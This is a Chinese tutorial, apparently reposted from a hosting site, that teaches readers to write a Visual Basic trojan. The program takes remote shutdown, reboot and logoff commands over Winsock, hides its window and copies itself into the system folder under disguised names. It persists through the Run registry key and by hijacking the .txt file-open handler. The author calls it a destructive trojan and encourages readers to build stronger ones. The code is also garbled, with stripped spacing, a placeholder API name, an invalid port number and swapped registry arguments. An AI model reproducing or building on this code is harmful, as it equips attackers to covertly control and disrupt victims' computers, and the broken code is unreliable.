首先，新建一工程，名为Server，新建一个窗体，Name为Server，在窗体中加入一个winsock控件，Name设为sckServer，协议设为默认的TCP／IP协议。

　　接下来我们回来Server窗体模块中，添加如下代码：

->PrivateSubform_Load()
　WithMe
　　.sckServer.LocalPort=88917本地端口（呵呵！我的生日！）
　　.sckServer.Listen开始监听
　EndWith
EndSub

接受客户端的连接请求。

PrivateSubsckServer_ConnectionRequest(ByValrequestIDAsLong)
　WithMe
　　If.sckServer.State<>sckClosedThen.sckServer.Close
　　.sckServer.Accept(requestID)
　EndWith
EndSub->
　　下面我们来建立客户端程序：新建一个工程，名为Client，把窗体名为Client，在上面加入一个winsock控件，名为sckClient，协议为TCP／IP协议。再加一个按钮cmdConnect在窗体模块中加入代码：

->PrivateSubform_Load()
　WithMe
　　.sckClient.RemoteHost="127.0.0.1"设置远程IP，本例设为本机。
　　.sckClient.RemotePort=88917远程端口,就为server中的设置一样.
　EndWith
EndSub

PrivatesubcmdConnect_Click()
　SckClient.Connect
Endsub->
　　至此，单击Connect按钮我们的两个工程已经可以进行通信了，但看不见，你可以在Client中的sckClient_Connect事件中加入代码：debug.print“Connetionsuccessful!”来查看。

　　这仅是第一步，一点工作也做不了，下面我们来为它们添加功能。为了简单，本文章只实现一点小小的功能―――关机，重启，注销。好，开始吧！

　　在Server工程中新建一个模块，Name为modApi，这个模快为一些API函数，添加如下API函数：

->PublicDeclareFunctionExitWindowXXXLib"user32"Alias"ExitWindowXXX"(ByValuFlagsAsLong,ByValdwReservedAsLong)AsLong

PublicConstEWX_LOGOFF=0
PublicConstEWX_REBOOT=2
PublicConstEWX_SHUTDOWN=1
PublicDeclareFunctionClipCursorLib"user32"Alias"ClipCursor"(lpRectAsAny)AsLong

PublicTypeRECT
　LeftAsLong
　TopAsLong
　RightAsLong
　BottomAsLong
EndType->
　　注：在两个socket中编程中，进行通信的重要事件是DataArrival事件，用于接收远程数据。

　　下面在Client工程的Client窗体中放入三个按钮，分别为cmdExit,cmdLogoff,cmdReboot。它们用于对远程的关机，注销，重启操作。分别添加如下代码：

->PrivateSubcmdExit_Click()
　Me.sckClient.SendData"Exit"
EndSub

PrivateSubcmdLogoff_Click()
　Me.sckClient.SendData"Logoff"
EndSub

PrivateSubcmdReboot_Click()
　Me.sckClient.SendData"Reboot"
EndSub->
　　全都是对服务端发出请求。下面转到Server工程中：在Server中添加sckServer的DataArrial事件，接收客户端的请求。

->PrivateSubsckServer_DataArrival(ByValbytesTotalAsLong)
　DimstrDataAsString
　WithMe
　　接收客户请求的信息
　　.sckServer.GetDatastrData
　　SelectCasestrData
　　　Case"Exit"
　　　　关机
　　　　CallExitWindowXXX(EWX_SHUTDOWN,0)
　　　Case"Reboot"
　　　　重启
　　　　CallExitWindowXXX(EWX_REBOOT,0)
　　　Case"Logoff"
　　　　注销
　　　CallExitWindowXXX(EWX_LOGOFF,0)
　　EndSelect
　EndWith

EndSub->
　　好了,到此我们已经实现功能了，但还不行，我们要它在背后运行。这简单，在Server中的form_Load事件中加入一句：me.hide。好这下看不见了，但大家知道木马是一开机就自动运行了，这又是为什么，怎么实现的？把它加入到注册表的启动组中？对，不错，跟我来吧！

　　回到Server工程中的modApi中加入如下API函数：

->PublicDeclareFunctionRegOpenKeyLib"advapi32.dll"Alias"RegOpenKeyA"(ByValhKeyAsLong,ByVallpSubKeyAsString,phkResultAsLong)AsLong

PublicDeclareFunctionRegSetvalueExLib"advapi32.dll"Alias"RegSetvalueExA"(ByValhKeyAsLong,ByVallpvalueNameAsString,ByValReservedAsLong,ByValdwTypeAsLong,lpDataAsAny,ByValcbDataAsLong)AsLong

PublicDeclareFunctionRegCreateKeyLib"advapi32.dll"Alias"RegCreateKeyA"(ByValhKeyAsLong,ByVallpSubKeyAsString,phkResultAsLong)AsLong
PublicConstREG_BINARY=3

PublicConstREG_SZ=1

PublicConstHKEY_LOCAL_MACHINE=&H80000002

PublicConstHKEY_CLASSES_ROOT=&H80000000->
　　写到注册表启动组中的过程。

->PublicSubStartupGroup()

　DimsKeyAsString
　DimresultAsLong
　DimhKeyIDAsLong
　DimsKeyValAsString

　sKey="Systrsy"启动组中的键,找一个与系统文件相近的。
　sKeyVal="C:/windows/system/systrsy.exe"木马文件的路径，可以用GetSystemDirectory来取得系统路径。
　result=RegOpenKey(HKEY_LOCAL_MACHINE,_
　　　"Software/Microsoft/Windows/CurrentVersion/Run",hKeyID)
　Ifresult=0Then
　　result=RegSetvalueEx(hKeyID,sKey,0&,REG_SZ,sKeyVal,Len(sKey) 1)
　EndIf
EndSub->
　　好，就这样简单地完成了。但是，想过没有，如果不是很菜的鸟，到注册表中见一删，我们苦苦的心血不就白白地浪费了吗？不行，还得想让他发现了删也删不掉。请看下面的代码：

->PublicSubWriteToTxt()

　DimresultAsLong
　DimhKeyIDAsLong
　DimskeyAsString
　DimskeyValAsString

　skey="txtfile/shell/open/command"
　skeyVal="C:/windows/system/txtView.exe"
　result=RegOpenKey(HKEY_CLASSES_ROOT,skeyVal,hKeyID)

　Ifresult=0Then
　　result=RegSetvalueEx(hKeyID,skey,0&,REG_SZ,skeyVal,Len(skeyVal) 1)
　EndIf
EndSub->
　　肯定不少朋友一看就知道了，原是与txt文件进行关联，一点也不错，但C:/windows/system/txtView.exe是哪里来的，我们的木马是C:/windows/system/systrsy.exe呀。这可是我们木马的分身了。

　　好，回到Server工程的Server窗体的form_Load中，加入如下代码：

->DimsCurrentPathAsString,sSystemDirAsString
sCurrentPath=App.Path&"/"&App.EXEName&".exe"
sSystemDir=“C:/windows/system”
OnErrorResumeNext

　复制文件成系统目录下的Systrsy.exe
　FileCopysCurrentPath,sSystemDir&"/Systrsy.exe"
OnErrorResumeNext

复制文件成系统目录下的txtView.exe

FileCopysCurrentPath,sSystemDir&"/txtView.exe"->
　　调用

->CallstartupGroup
CallWriteToTxt

判断程序是否下在运行

IfApp.PrevInstanceThen
　如果已经运行就退出。
End

EndIf->
　　好了，写到这里一个破坏性木马已经诞生了，我实验过还是比较好的一个，希望大家也能写一个好的木马，能突破冰河(呵呵！)

　　注意：

　　1、大家在处理端口是最好使用高端端口，否则会和一些常用端口发生冲突

　　2、在第一次使用VB.NET的最好看看有关的图书，可能你能写出一款超级木马也说不定
->

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!